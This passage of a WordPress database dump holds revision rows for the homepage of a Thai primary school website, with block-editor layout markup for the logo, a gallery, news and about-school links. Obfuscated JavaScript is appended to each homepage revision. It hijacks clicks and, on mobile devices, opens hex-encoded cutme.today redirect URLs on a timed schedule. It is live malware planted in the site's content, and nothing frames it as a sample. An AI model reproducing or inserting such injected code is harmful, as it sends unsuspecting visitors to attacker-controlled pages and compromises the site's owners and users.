_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:05:01','2024-07-27 04:05:01','',14,'http://pakhaeng.ssk.in.th/?p=74',0,'revision','',0),
(76,1,'2024-07-27 11:05:32','2024-07-27 04:05:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:05:32','2024-07-27 04:05:32','',14,'http://pakhaeng.ssk.in.th/?p=76',0,'revision','',0),
(78,1,'2024-07-27 11:07:27','2024-07-27 04:07:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https: